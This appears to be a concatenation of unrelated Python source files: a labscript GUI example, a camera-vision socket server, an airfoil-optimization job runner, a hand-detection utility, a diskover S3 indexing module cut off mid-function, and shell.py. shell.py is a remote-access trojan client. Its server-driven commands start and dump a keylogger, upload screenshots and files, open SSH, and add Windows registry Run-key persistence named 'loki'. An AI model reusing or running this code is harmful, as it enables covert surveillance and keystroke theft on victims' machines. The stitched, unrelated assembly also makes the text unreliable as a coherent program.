self.layout.addWidget(foobutton) self.layout.addWidget(barbutton) self.layout.addWidget(bazbutton) self.layout.addWidget(addbazbutton) self.layout.addWidget(removebazbutton) self.layout.addWidget(bazunpickleable) self.layout.addWidget(fatalbutton) self.layout.addWidget(self.checkbutton) foobutton.clicked.connect(self.foo) barbutton.clicked.connect(self.bar) bazbutton.clicked.connect(self.baz) fatalbutton.clicked.connect(self.fatal ) addbazbutton.clicked.connect(self.add_baz_timeout) removebazbutton.clicked.connect(self.remove_baz_timeout) bazunpickleable.clicked.connect(self.baz_unpickleable) # It is critical that you decorate your callbacks with @define_state # as below. This makes the function get queued up and executed # in turn by our state machine instead of immediately by the # GTK mainloop. Only don't decorate if you're certain that your # callback can safely happen no matter what state the system is # in (for example, adjusting the axis range of a plot, or other # appearance settings). You should never be calling queue_work # or do_after from un undecorated callback. @define_state(MODE_MANUAL,True) def foo(self): self.logger.debug('entered foo') #self.toplevel.set_sensitive(False) # Here's how you instruct the worker process to do # something. When this callback returns, the worker will be # requested to do whatever you ask in queue_work (in this # case, MyWorker.foo(5,6,7,x='x') ). Then, no events will # be processed until that work is done. Once the work is # done, whatever has been set with do_after will be executed # (in this case self.leave_foo(1,2,3,bar=baz) ). results = yield(self.queue_work('My worker','foo', 5,6,7,x='x')) #self.toplevel.set_sensitive(True) self.logger.debug('leaving foo') # Here's what's NOT to do: forgetting to decorate a callback with @define_state # when it's not something that can safely be done asynchronously # to the state machine: def fatal(self): # This bug could be hard to track because nothing will happen # when you click the button -- only once you do some other, # correcly decorated callback will it become apparant that # something is wrong. So don't make this mistake! self.queue_work('My worker','foo', 5,6,7,x='x') @define_state(MODE_MANUAL,True) def bar(self): self.logger.debug('entered bar') results = yield(self.queue_work('My worker','bar', 5,6,7,x=5)) self.logger.debug('leaving bar') @define_state(MODE_MANUAL,True) def baz(self, button=None): print(threading.current_thread().name) self.logger.debug('entered baz') results = yield(self.queue_work('My worker','baz', 5,6,7,x='x',return_queue=self.checkbutton.isChecked())) print(results) print(threading.current_thread().name) results = yield(self.queue_work('My worker','baz', 4,6,7,x='x',return_queue=self.checkbutton.isChecked())) print(results) print(threading.current_thread().name) self.logger.debug('leaving baz') # This event shows what happens if you try to send a unpickleable # event through a queue to the subprocess: @define_state(MODE_MANUAL,True) def baz_unpickleable(self): self.logger.debug('entered baz_unpickleable') results = yield(self.queue_work('My worker','baz', 5,6,7,x=threading.Lock())) self.logger.debug('leaving baz_unpickleable') # You don't need to decorate with @define_state if all you're # doing is adding a timeout -- adding a timeout can safely be done # asynchronously. But you can still decorate if you want, and you # should if you're doing other work in the same function call which # can't be done asynchronously. def add_baz_timeout(self): self.statemachine_timeout_add(2000,self.baz) # Similarly, no @define_state is required here -- same applies as above. def remove_baz_timeout(self): self.statemachine_timeout_remove(self.baz) class MyWorker(Worker): def init(self): # You read correctly, this isn't __init__, it's init. It's the # first thing that will be called in the new process. You should # do imports here, define instance variables, that sort of thing. You # shouldn't import the hardware modules at the top of your file, # because then they will be imported in both the parent and # the child processes and wont be cleanly restarted when the subprocess # is restarted. Since we're inside a method call though, you'll # have to use global statements for the module imports, as shown # below. Either that or you can make them instance variables, ie: # import module; self.module = module. Up to you, I prefer # the former. global serial; import serial self.logger.info('got x! %d' % self.x) raise Exception('bad import!') # Here's a function that will be called when requested by the parent # process. There's nothing special about it really. Its return # value will be passed as a keyword argument _results to the # function which was queued with do_after, if there was one. def foo(self,*args,**kwargs): self.logger.debug('working on foo!') time.sleep(10) return 'results!!!' def bar(self,*args,**kwargs): self.logger.debug('working on bar!') time.sleep(10) raise Exception('error!') return 'results!!!' def baz(self,zzz,*args,**kwargs): self.logger.debug('working on baz: time is %s'%repr(time.time())) time.sleep(0.5) if kwargs['return_queue']: return queue.Queue() return 'results%d!!!'%zzz if __name__ == '__main__': import sys import logging.handlers # Setup logging: logger = logging.getLogger('BLACS') handler = logging.handlers.RotatingFileHandler(os.path.join(BLACS_DIR, 'BLACS.log'), maxBytes=1024**2, backupCount=0) formatter = logging.Formatter('%(asctime)s %(levelname)s %(name)s: %(message)s') handler.setFormatter(formatter) handler.setLevel(logging.DEBUG) logger.addHandler(handler) if sys.stdout is not None and sys.stdout.isatty(): terminalhandler = logging.StreamHandler(sys.stdout) terminalhandler.setFormatter(formatter) terminalhandler.setLevel(logging.INFO) logger.addHandler(terminalhandler) else: sys.stdout = sys.stderr = open(os.devnull) logger.setLevel(logging.DEBUG) logger.info('\n\n===============starting===============\n') if __name__ == '__main__': from labscript_utils.qtwidgets.dragdroptab import DragDropTabWidget app = QApplication(sys.argv) window = QWidget() layout = QVBoxLayout(window) notebook = DragDropTabWidget() layout.addWidget(notebook) class FakeConnection(object): def __init__(self): self.BLACS_connection = 'None' class FakeConnectionTable(object): def __init__(self): pass def find_by_name(self, device_name): return FakeConnection() connection_table = FakeConnectionTable() tab1 = MyTab(notebook,settings = {'device_name': 'Example', 'connection_table':connection_table}) tab2 = MyTab(notebook,settings = {'device_name': 'Example2', 'connection_table':connection_table}) window.show() def run(): app.exec_() tab1.close_tab() tab2.close_tab() sys.exit(run())
server.py
from __future__ import print_function, division __import__('sys').dont_write_bytecode = True # prevent stupid pyc files import socket as s import time import threading from boltons.socketutils import BufferedSocket import cv2 import json from imageprocessor import process from camera import Camera from manualcontrol import ManualController # Diagonal fov of webcam in degrees. X fov will be calculated with aspect ratio. DIAG_FOV = 83 VISUALIZE_FEED = True port = 4444 udp_port = 4445 serversocket = s.socket() serversocket.bind(('0.0.0.0', port)) serversocket.listen(1) def udp_listener_thread(): udp_sock = s.socket(s.AF_INET, s.SOCK_DGRAM) udp_sock.bind(('0.0.0.0', udp_port)) print('Waiting for udp ping!') msg, addr = udp_sock.recvfrom(256) print('Recieved udp ping from {}!'.format(addr)) udp_sock.sendto(msg, addr) def millis(): return round(time.time()*1000) udp_thread = threading.Thread(target=udp_listener_thread, args=()) udp_thread.daemon = True udp_thread.start() print('Waiting for TCP connection...') socket, addr = serversocket.accept() print('Recieved TCP connection from {}!'.format(addr)) serversocket.close() socket = BufferedSocket(socket) class SimpleNamespace(): pass last_frame = SimpleNamespace() lock = threading.Lock() def overwrite(message): global last_message try: print('\r' + ''.join([' ']*len(last_message)), end='') except: pass print('\r' + message, end='') last_message = message def communicate_thread(): try: while True: request = socket.recv_until(b'\n',timeout=None).decode('utf-8') request = json.loads(request) if request['id'] == 1: lock.acquire() response_json = json.dumps(last_frame.__dict__) response = response_json + '\n' lock.release() if response != '{}\n': overwrite(response_json) socket.send(response.encode()) socket.flush() elif request['id'] == -1: break; except: pass print('') global running running = False vision = Camera(process, DIAG_FOV) print('Camera resolution: %s' % str(vision.resolution())) controller = ManualController() img_thread = threading.Thread(target=communicate_thread) img_thread.daemon = True img_thread.start() running = True while True: if not running: break if controller.manual_control(): lock.acquire() last_frame = controller.get_frame() lock.release() else: global img frame, img = vision.get_vision_frame(visualize=VISUALIZE_FEED) if frame is not None and img is not None: lock.acquire() last_frame = frame lock.release() if VISUALIZE_FEED: cv2.imshow('Image',img) cv2.waitKey(1) vision.release() controller.release() cv2.destroyAllWindows()
runner.py
import configparser import datetime import glob import h5py import json import os import requests import smtplib import subprocess import sys import time import threading from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText from email.mime.image import MIMEImage config = configparser.ConfigParser() config.read(os.environ["SMTP_SETTINGS"]) config = config["DEFAULT"] def reporter(host, id): while True: hdf5_files = glob.glob("*.hdf5") if len(hdf5_files): try: if len(hdf5_files) > 1: for file in hdf5_files[:-1]: os.remove(file) with h5py.File(hdf5_files[-1], "r") as f: requests.post( f"{host}/runs/update", json={ "id": id, "progress": { "iteration": int(hdf5_files[-1].split(".")[0]), "pop": f["pop"][:].tolist(), "fit": f["fit"][:].tolist(), }, }, ) os.remove(hdf5_files[-1]) continue except: pass time.sleep(0.1) def run( cl, re, ma, n_c, n_t, gen=100, tolx=1e-8, tolf=1e-8, fix_te=True, t_te_min=0.0, t_c_min=0.01, r_le_min=0.05, A_cs_min=None, Cm_max=None, strategy="rand-to-best/1/exp/random", f=None, cr=None, adaptivity=2, n_proc=28, run_name=None, report=False, **kwargs, ): """ Solve the specified optimization problem and handle reporting of results. Parameters ---------- cl : float Design lift coefficient re : float Reynolds number ma : float Mach number n_c, n_t : int Number of CST coefficients for the chord line and thickness distribution, respectively gen : int, optional Number of generations to use for the genetic algorithm. 100 by default tolx : float, optional Tolerance on the spread of the design vectors. tolf: float, optional Tolerance on the spread of objective functions. fix_te : bool, optional True if the trailing edge thickness should be fixed. True by default t_te_min : float, optional Minimum TE thickness as fraction of chord length. Default is 0.0. t_c_min : float or None, optional Minimum thickness over chord ratio. None if unconstrained. Defaults is 0.01. r_le_min : float or None, optional Minimum leading edge radius. None if unconstrained. Defaults is 0.05. A_cs_min : float or None, optional Minimum cross sectional area. None if unconstrained. Default is None. Cm_max : float or None, optional Maximum absolute moment coefficient. None if unconstrained. Default is None. strategy : string, optional Evolution strategy to use. Default is 'rand-to-best/1/exp/random'. f : float or None, optional Mutation rate cr : float or None, optional Crossover rate adaptivity : 0, 1, or 2 Which kind of self-adaptivity to ue (0: none, 1: simple, 2: complex) n_proc : int, optional Number of processors to use to evaluate functions in parallel using MPI. 28 by default run_name : str, optional Name of the run. If None, an ISO formatted UTC timestamp will be used. report : bool, optional True if the results should be reported via email. """ returncode = -1 try: if run_name is None: now = datetime.datetime.utcnow() run_name = ( now.isoformat(timespec="seconds").replace("-", "").replace(":", "") + "Z" ) path = os.path.join(os.path.abspath(os.environ["RESULTS_DIR"]), run_name) os.makedirs(path) repr_file = os.path.join(path, "repr.yml") dat_file = os.path.join(path, "optimized.dat") png_file = os.path.join(path, "optimized.png") log_file = os.path.join(path, "log.txt") cmd = [ "mpirun", "-np", str(n_proc), "python3", "-u", "-m", "af_opt.problem", str(cl), str(re), str(ma), str(n_c), str(n_t), str(gen), str(tolx), str(tolf), str(fix_te), str(t_te_min), str(t_c_min), str(r_le_min), str(A_cs_min), str(Cm_max), strategy, str(f), str(cr), str(adaptivity), str(repr_file), str(dat_file), str(png_file), ] print(f"Going to run the following command: \n{cmd}") process = subprocess.Popen( cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT ) for line in process.stdout: s = line.decode("utf-8") sys.stdout.write(s) with open(log_file, "a+") as log: log.write(s) with open(log_file, "r") as f: all_text = f.read() with open(log_file, "w") as f: f.write(all_text.replace("\n\n", "\n")) process.communicate() returncode = process.returncode if report: print("Going to send an email") msg = MIMEMultipart() msg["From"] = config["user"] msg["To"] = config["receiver"] msg["Subject"] = "Airfoil Optimization Complete!" with open(repr_file, "r") as f: msg.attach(MIMEText(f.read(), "plain")) f.seek(0) attachment = MIMEText(f.read(), _subtype="yaml") attachment.add_header( "Content-Disposition", "attachment", filename=os.path.basename(repr_file), ) msg.attach(attachment) with open(png_file, "rb") as fp: attachment = MIMEImage(fp.read(), _subtype="png") attachment.add_header( "Content-Disposition", "attachment", filename=os.path.basename(png_file), ) msg.attach(attachment) with open(dat_file, "r") as f: attachment = MIMEText(f.read()) attachment.add_header( "Content-Disposition", "attachment", filename=os.path.basename(dat_file), ) msg.attach(attachment) with open(log_file, "r", encoding="utf-8") as f: attachment = MIMEText(f.read()) attachment.add_header( "Content-Disposition", "attachment", filename=os.path.basename(log_file), ) msg.attach(attachment) with smtplib.SMTP_SSL(config["host"], int(config["port"])) as server: server.ehlo() server.login(config["user"], config["password"]) server.sendmail(config["user"], config["receiver"], msg.as_string()) print("Email sent") except Exception as e: print(e) return returncode def main(): """ Poll runs service for new run cases and run them. """ host = os.environ["RUNS_SERVICE_URL"] while True: try: r = requests.get(f"{host}/runs/accept") if r.status_code == 204: time.sleep(1) continue response_object = r.json() id = response_object["data"]["id"] kwargs = dict(response_object["data"]) print(f"Got a request to start a run with the following data: \n{kwargs}") thread = threading.Thread(target=reporter, args=(host, id)) thread.start() returncode = run(**kwargs, host=host) print(f"Returncode: {returncode}") requests.post( f"{host}/runs/complete", json={"id": id, "success": returncode == 0} ) except requests.exceptions.ConnectionError as e: pass except json.decoder.JSONDecodeError: print(f"Invalid response from server: {r}") except TypeError: print("Invalid run case") requests.post(f"{host}/runs/complete", json={"id": id, "success": False}) if __name__ == "__main__": main()
detector_utils.py
# Utilities for object detector. import numpy as np import sys import tensorflow as tf import os from threading import Thread from datetime import datetime import cv2 from utils import label_map_util from collections import defaultdict detection_graph = tf.Graph() sys.path.append("..") # score threshold for showing bounding boxes. _score_thresh = 0.05 MODEL_NAME = 'hand_inference_graph' # Path to frozen detection graph. This is the actual model that is used for the object detection. PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb' # List of the strings that is used to add correct label for each box. PATH_TO_LABELS = os.path.join(MODEL_NAME, 'hand_label_map.pbtxt') NUM_CLASSES = 1 # load label map label_map = label_map_util.load_labelmap(PATH_TO_LABELS) categories = label_map_util.convert_label_map_to_categories( label_map, max_num_classes=NUM_CLASSES, use_display_name=True) category_index = label_map_util.create_category_index(categories) # Load a frozen infrerence graph into memory def load_inference_graph(): # load frozen tensorflow model into memory print("> ====== loading HAND frozen graph into memory") detection_graph = tf.Graph() with detection_graph.as_default(): od_graph_def = tf.GraphDef() with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid: serialized_graph = fid.read() od_graph_def.ParseFromString(serialized_graph) tf.import_graph_def(od_graph_def, name='') sess = tf.Session(graph=detection_graph) print("> ====== Hand Inference graph loaded.") return detection_graph, sess # draw the detected bounding boxes on the images # You can modify this to also draw a label. def draw_box_on_image(num_hands_detect, score_thresh, scores, boxes, im_width, im_height, image_np): coordinates = [] for i in range(num_hands_detect): if (scores[i] > score_thresh): (left, right, top, bottom) = (boxes[i][1] * im_width, boxes[i][3] * im_width, boxes[i][0] * im_height, boxes[i][2] * im_height) # if the bounding box is too large, ignore them box_width = int(right) - int(left) box_height = int(bottom) - int(top) if box_width >= im_width/2 or box_height >= im_height/2: continue center = (int((int(right) + int(left))/2), int((int(bottom) + int(top))/2)) p1 = (int(left), int(top)) p2 = (int(right), int(bottom)) # if the hand is not within the region of interest, ignore them if center[0] > int(0.8 * im_width) or center[0] < int(0.2 * im_width) or center[1] < int(0.5 * im_height): continue # draw bounding box cv2.rectangle(image_np, p1, p2, (77, 255, 9), 3, 1) # plot the center of the bounding box cv2.circle(image_np, center, 5, (255, 0, 0), -1) coordinates.append(center) return coordinates # Show fps value on image. def draw_fps_on_image(fps, image_np): cv2.putText(image_np, fps, (20, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (77, 255, 9), 2) # Actual detection .. generate scores and bounding boxes given an image def detect_objects(image_np, detection_graph, sess): # Definite input and output Tensors for detection_graph image_tensor = detection_graph.get_tensor_by_name('image_tensor:0') # Each box represents a part of the image where a particular object was detected. detection_boxes = detection_graph.get_tensor_by_name( 'detection_boxes:0') # Each score represent how level of confidence for each of the objects. # Score is shown on the result image, together with the class label. detection_scores = detection_graph.get_tensor_by_name( 'detection_scores:0') detection_classes = detection_graph.get_tensor_by_name( 'detection_classes:0') num_detections = detection_graph.get_tensor_by_name( 'num_detections:0') image_np_expanded = np.expand_dims(image_np, axis=0) (boxes, scores, classes, num) = sess.run( [detection_boxes, detection_scores, detection_classes, num_detections], feed_dict={image_tensor: image_np_expanded}) return np.squeeze(boxes), np.squeeze(scores) # Code to thread reading camera input. # Source : Adrian Rosebrock # https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/ class WebcamVideoStream: def __init__(self, src, width, height): # initialize the video camera stream and read the first frame # from the stream self.stream = cv2.VideoCapture(src) self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width) self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height) (self.grabbed, self.frame) = self.stream.read() # initialize the variable used to indicate if the thread should # be stopped self.stopped = False def start(self): # start the thread to read frames from the video stream Thread(target=self.update, args=()).start() return self def update(self): # keep looping infinitely until the thread is stopped while True: # if the thread indicator variable is set, stop the thread if self.stopped: return # otherwise, read the next frame from the stream (self.grabbed, self.frame) = self.stream.read() def read(self): # return the frame most recently read return self.frame def size(self): # return size of the capture device return self.stream.get(3), self.stream.get(4) def stop(self): # indicate that the thread should be stopped self.stopped = True
shell.py
# Date: 06/04/2018 # Author: Pure-L0G1C # Description: Communicate with server import sys import subprocess from os import chdir from time import sleep from queue import Queue from threading import Thread, RLock from . import ssh, sftp, screen, sscreenshare, keylogger class Shell(object): def __init__(self, sess_obj, services, home): self.recv_queue = Queue() self.disconnected = False self.services = services self.session = sess_obj self.home = home self.is_alive = True self.lock = RLock() self.ftp = None self.ssh = None self.keylogger = None self.screenshare = None self.cmds = { 1: self.ssh_obj, 2: self.reconnect, 3: self.download, 4: self.upload, 5: self.screen, 6: self.chrome, 7: self.disconnect, 8: self.create_persist, 9: self.remove_persist, 12: self.logger_start, 13: self.logger_stop, 14: self.logger_dump, 15: self.screenshare_start, 16: self.screenshare_stop } def listen_recv(self): while self.is_alive: recv = self.session.recv() if recv == -1: continue # timed out if recv: with self.lock: self.recv_queue.put(recv) else: if self.is_alive: self.is_alive = False self.display_text('Server went offline') def parser(self): while self.is_alive: if self.recv_queue.qsize(): data = self.recv_queue.get() code = data['code'] args = data['args'] self.display_text(data['args']) if code in self.cmds: Thread(target=self.cmds[code], args=[ args], daemon=True).start() def stop(self): if self.ssh: self.ssh.close() if self.ftp: self.ftp.close() if self.keylogger: self.keylogger.stop() if self.screenshare: self.screenshare.stop() def shell(self): t1 = Thread(target=self.listen_recv) t2 = Thread(target=self.parser) t1.daemon = True t2.daemon = True t1.start() t2.start() while self.is_alive: try: sleep(0.5) except: break self.close() def send(self, code=None, args=None): self.session.send(code=code, args=args) # -------- UI -------- # def display_text(self, text): print('{0}Response: {1}{0}'.format('\n\n\t', text)) def close(self): self.is_alive = False self.session.shutdown() self.stop() def reconnect(self, args): print('Reconnecting ...') self.close() def disconnect(self, args): print('Disconnecting ...') self.disconnected = True self.close() def ssh_obj(self, args): if self.ssh: self.ssh.close() self.ssh = ssh.SSH( self.services['ssh']['ip'], self.services['ssh']['port'], self.home) t = Thread(target=self.ssh.client) t.daemon = True t.start() def screenshare_start(self, update): if self.screenshare: self.screenshare.stop() self.screenshare = sscreenshare.ScreenShare( self.services['ftp']['ip'], self.services['ftp']['port'], update ) if self.screenshare.setup() != 0: self.screenshare = None else: Thread(target=self.screenshare.start, daemon=True).start() def screenshare_stop(self, args): if self.screenshare: self.screenshare.stop() def download(self, args): print('Downloading ...') self.ftp = sftp.sFTP( self.services['ftp']['ip'], self.services['ftp']['port'], self.home, verbose=True) try: self.ftp.recv() except: pass finally: self.ftp.close() def upload(self, file): print('Uploading {}'.format(file)) self.ftp = sftp.sFTP( self.services['ftp']['ip'], self.services['ftp']['port'], self.home, verbose=True) try: self.ftp.send(file) except: pass finally: self.ftp.close() def screen(self, args): chdir(self.home) screen.screenshot() self.upload(screen.file) screen.clean_up() def chrome(self, urls): if '-1' in urls: return cmd = 'start chrome -incognito {}'.format(' '.join(urls)) subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) def create_persist(self, args): if hasattr(sys, 'frozen'): _path = sys.executable cmd = r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v loki /f /d "\"{}\""'.format( _path) subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) def remove_persist(self, args): if hasattr(sys, 'frozen'): cmd = r'reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v loki /f' subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) def logger_start(self, args): if not self.keylogger: self.keylogger = keylogger.Keylogger() self.keylogger.start() def logger_stop(self, args): if self.keylogger: self.keylogger.stop() def logger_dump(self, args): if self.keylogger: self.send(-0, self.keylogger.dump())
diskover_s3.py
#!/usr/bin/env python # -*- coding: utf-8 -*- """diskover - Elasticsearch file system crawler diskover is a file system crawler that index's your file metadata into Elasticsearch. See README.md or https://github.com/shirosaidev/diskover for more information. Amazon S3 inventory module for diskover Copyright (C) Chris Park 2017-2018 diskover is released under the Apache 2.0 license. See LICENSE for the full license text. """ import os import gzip import csv from datetime import datetime import time import hashlib try: from Queue import Queue as pyQueue except ImportError: from queue import Queue as pyQueue from threading import Thread, RLock from diskover import config, plugins, progress_bar from diskover_bot_module import get_worker_name, auto_tag, es_bulk_add, file_excluded fake_dirs = [] buckets = [] workername = get_worker_name() # create queue and threads for bulk adding to ES s3queue = pyQueue() s3threadlock = RLock() def process_line(row, tree_dirs, tree_files, cliargs): global fake_dirs n = 2 # S3 Inventory csv column headers inventory_dict = {'s3_bucket': row[0], 's3_key': row[1]} try: inventory_dict['s3_size'] = int(row[n]) n = n + 1 except IndexError: pass try: inventory_dict['s3_last_modified_date'] = row[n] n = n + 1 except IndexError: pass try: inventory_dict['s3_etag'] = row[n] n = n + 1 except IndexError: pass try: inventory_dict['s3_storage_class'] = row[n] n = n + 1 except IndexError: pass try: inventory_dict['s3_multipart_upload'] = row[n] n = n + 1 except IndexError: pass try: inventory_dict['s3_replication_status'] = row[n] n = n + 1 except IndexError: pass try: inventory_dict['s3_encryption_status'] = row[n] except IndexError: pass # prepare inventory dict for diskover index # fake path /s3/bucketname/key bucket = '/s3/' + row[0] + '/' path = os.path.join(bucket, inventory_dict['s3_key']) # check if directory if path.endswith('/'): isdir = True path = path.rstrip('/') s3threadlock.acquire() fake_dirs.append(path) s3threadlock.release() else: isdir = False # add any directories in path to fake dirs splitpath = inventory_dict['s3_key'].split('/') # remove file name splitpath = splitpath[:-1] prev_path = bucket.rstrip('/') for p in splitpath: # create fake directory entry s3threadlock.acquire() dir_dict = make_fake_s3_dir(prev_path, p, cliargs) s3threadlock.release() current_path = os.path.join(prev_path, p) if dir_dict is None: prev_path = current_path continue tree_dirs.append(dir_dict) # increment items counts of parentdir for d in tree_dirs: if d['filename'] == os.path.basename(dir_dict['path_parent']): d['items_subdirs'] += 1 d['items'] += 1 break prev_path = current_path size = inventory_dict['s3_size'] # filename filename = os.path.basename(path) # check if file is in exluded_files list extension = os.path.splitext(filename)[1][1:].strip().lower() if file_excluded(filename, extension, path, cliargs['verbose']): return tree_dirs, tree_files # Skip files smaller than minsize cli flag if not isdir and size < cliargs['minsize']: return tree_dirs, tree_files # modified time mtime_utc = inventory_dict['s3_last_modified_date'].partition('.')[0] # modified time in unix mtime_unix = time.mktime(time.strptime(mtime_utc, '%Y-%m-%dT%H:%M:%S')) # get time indextime_utc = datetime.utcnow().isoformat() # get absolute path of parent directory parentdir = os.path.abspath(os.path.join(path, os.pardir)) # absolute full path fullpath = os.path.abspath(os.path.join(parentdir, filename)) # remove any keys (fields) we don't want to add to ES inventory_dict.pop('s3_size', None) inventory_dict.pop('s3_last_modified_date', None) if isdir: # directory inventory_dict['filename'] = filename inventory_dict['path_parent'] = parentdir inventory_dict["filesize"] = 0 inventory_dict["items"] = 1 # 1 for itself inventory_dict["items_files"] = 0 inventory_dict["items_subdirs"] = 0 inventory_dict["last_modified"] = mtime_utc inventory_dict["tag"] = "" inventory_dict["tag_custom"] = "" inventory_dict["indexing_date"] = indextime_utc inventory_dict["worker_name"] = workername inventory_dict["change_percent_filesize"] = "" inventory_dict["change_percent_items"] = "" inventory_dict["change_percent_items_files"] = "" inventory_dict["change_percent_items_subdirs"] = "" inventory_dict["_type"] = "directory" # increment items counts of parentdir for d in tree_dirs: if d['filename'] == os.path.basename(parentdir): d['items_subdirs'] += 1 d['items'] += 1 break # add any autotags to inventory_dict if cliargs['autotag'] and len(config['autotag_dirs']) > 0: auto_tag(inventory_dict, 'directory', mtime_unix, None, None) # check plugins for adding extra meta data to dirmeta_dict for plugin in plugins: try: # check if plugin is for directory doc mappings = {'mappings': {'directory': {'properties': {}}}} plugin.add_mappings(mappings) inventory_dict.update(plugin.add_meta(fullpath)) except KeyError: pass tree_dirs.append(inventory_dict) else: # file # Convert time in days (mtime cli arg) to seconds time_sec = cliargs['mtime'] * 86400 file_mtime_sec = time.time() - mtime_unix # Only process files modified at least x days ago if file_mtime_sec < time_sec: return tree_files, tree_dirs # create md5 hash of file using metadata filesize and mtime filestring = str(size) + str(mtime_unix) filehash = hashlib.md5(filestring.encode('utf-8')).hexdigest() inventory_dict['filename'] = filename inventory_dict['path_parent'] = parentdir inventory_dict["extension"] = extension inventory_dict["filesize"] = size inventory_dict["last_modified"] = mtime_utc inventory_dict["filehash"] = filehash inventory_dict["tag"] = "" inventory_dict["tag_custom"] = "" inventory_dict["dupe_md5"] = "" inventory_dict["indexing_date"] = indextime_utc inventory_dict["worker_name"] = workername inventory_dict["_type"] = "file" # add file size and increment items counts to parentdir for d in tree_dirs: if d['filename'] == os.path.basename(parentdir): d['filesize'] += size d['items_files'] += 1 d['items'] += 1 break # check plugins for adding extra meta data to inventory_dict for plugin in plugins: try: # check if plugin is for file doc mappings = {'mappings': {'file': {'properties': {}}}} plugin.add_mappings(mappings) inventory_dict.update(plugin.add_meta(fullpath)) except KeyError: pass # add any autotags to inventory_dict if cliargs['autotag'] and len(config['autotag_files']) > 0: auto_tag(inventory_dict, 'file', mtime_unix, None, None) tree_files.append(inventory_dict) return tree_dirs, tree_files def process_s3_inventory(inventory_file, cliargs): """Process s3 inventory function. Takes an S3 inventory file (gzipped csv), processes and bulk adds it into diskover index. """ global buckets tree_dirs = [] tree_files = [] with gzip.open(inventory_file, mode='rt') as f: reader = csv.reader(f, delimiter=',', quotechar='"') l = 1 for row in reader: # get bucket name from first line of inventory file if l == 1: # add fake root /s3 directory entry to list if "/s3" not in buckets: s3threadlock.acquire() buckets.append("/s3") # create fake root /s3/bucketname directory entry for s3 bucket root_dict = make_fake_s3_dir('/', 's3', cliargs) s3threadlock.release() # check if bucket fake dir already created if root_dict: tree_dirs.append(root_dict) # add fake root /s3/bucketname directory entry for s3 bucket to list bucket_path = os.path.abspath(os.path.join('/s3', row[0])) if bucket_path not in buckets: s3threadlock.acquire() buckets.append(bucket_path) # create fake root /s3/bucketname directory entry for s3 bucket root_dict = make_fake_s3_dir('/s3', row[0], cliargs) s3threadlock.release() # check if bucket fake dir already created if root_dict: tree_dirs.append(root_dict) tree_dirs, tree_files = process_line(row, tree_dirs, tree_files, cliargs) l += 1 if len(tree_dirs) + len(tree_files) > 0: es_bulk_add(workername, tree_dirs, tree_files, cliargs, 0) def make_fake_s3_dir(parent, file, cliargs): """Make fake s3 directory function. Creates a fake directory doc for es. Returns dictionary for directory doc. """ global fake_dirs fullpath = os.path.abspath(os.path.join(parent, file)) if fullpath in fake_dirs: return None mtime_utc = "1970-01-01T00:00:00" mtime_unix = time.mktime(time.strptime(mtime_utc, '%Y-%m-%dT%H:%M:%S')) dir_dict = {} dir_dict['filename'] = file dir_dict['path_parent'] = parent dir_dict["filesize"] = 0 dir_dict["items"] = 1 # 1 for itself dir_dict["items_files"] = 0 dir_dict["items_subdirs"] = 0 dir_dict["last_modified"] = mtime_utc dir_dict["tag"] = "" dir_dict["tag_custom"] = "" dir_dict["indexing_date"] = datetime.utcnow().isoformat() dir_dict["worker_name"] = workername dir_dict["change_percent_filesize"] = "" dir_dict["change_percent_items"] = "" dir_dict["change_percent_items_files"] = "" dir_dict["change_percent_items_subdirs"] = "" dir_dict["_type"] = "directory" # add any autotags to inventory_dict if cliargs['autotag'] and len(config['autotag_dirs']) > 0: auto_tag(dir_dict, 'directory', mtime_unix, None, None) # check plugins for adding extra meta data to dirmeta_dict for plugin in plugins: try: # check if plugin is for directory doc mappings = {'mappings': {'directory': {'properties': {}}}} plugin.add_mappings(mappings) dir_dict.update(plugin.add_meta(fullpath)) except KeyError: pass # store in fake_dirs s3threadlock.acquire() fake_dirs.append(fullpath) s3threadlock.release() return dir_dict def get_s3_mappings(config): mappings = { "settings": { "index" : { "number_of_shards": config['index_shards'], "number_of_replicas": config['index_replicas'] } }, "mappings": { "directory": { "properties": { "s3_bucket": { "type": "keyword" }, "s3_key": { "type": "keyword" }, "s3_etag": { "type": "keyword" }, "s3_storage_class": { "type": "keyword" }, "s3_multipart_upload": { "type": "boolean" }, "s3_replication_status": { "type": "keyword" }, "s3_encryption_status": { "type": "keyword" }, "filename": { "type": "keyword" }, "path_parent": { "type": "keyword" }, "filesize": { "type": "long" }, "items": { "type": "long" }, "items_files": { "type": "long" }, "items_subdirs": { "type": "long" }, "last_modified": { "type": "date" }, "tag": { "type": "keyword" }, "tag_custom": { "type": "keyword" }, "indexing_date": { "type": "date" }, "worker_name": { "type": "keyword" }, "change_percent_filesize": { "type": "float" }, "change_percent_items": { "type": "float" }, "change_percent_items_files": { "type": "float" }, "change_percent_items_subdirs": { "type": "float" } } }, "file": { "properties": { "s3_bucket": { "type": "keyword" }, "s3_key": { "type": "keyword" }, "s3_etag": { "type": "keyword" }, "s3_storage_class": { "type": "keyword" }, "s3_multipart_upload": { "type": "boolean" }, "s3_replication_status": { "type": "keyword" }, "s3_encryption_status": { "type": "keyword" }, "filename": { "type": "keyword" }, "extension": { "type": "keyword" }, "path_parent": { "type": "keyword" }, "filesize": { "type": "long" }, "last_modified": { "type": "date" }, "filehash": { "type": "keyword" }, "tag": { "type": "keyword" }, "tag_custom": { "type": "keyword" }, "dupe_md5": { "type": "keyword" }, "indexing_date": { "type": "date" }, "worker_name": { "type": "keyword" } } } } } return mappings def csv_file_reader(q): """s3 inventory file reader thread function. """ while True: item = q.get() inventory_file, cliargs = item process_s3_inventory(inventory_file, cliargs) q.task_done() def start_importing(es, cliargs, logger): """Start importing s3 inventory file function. """ for i in range(4): thread = Thread(target=csv_file_reader, args=(s3queue,)) thread.daemon = True 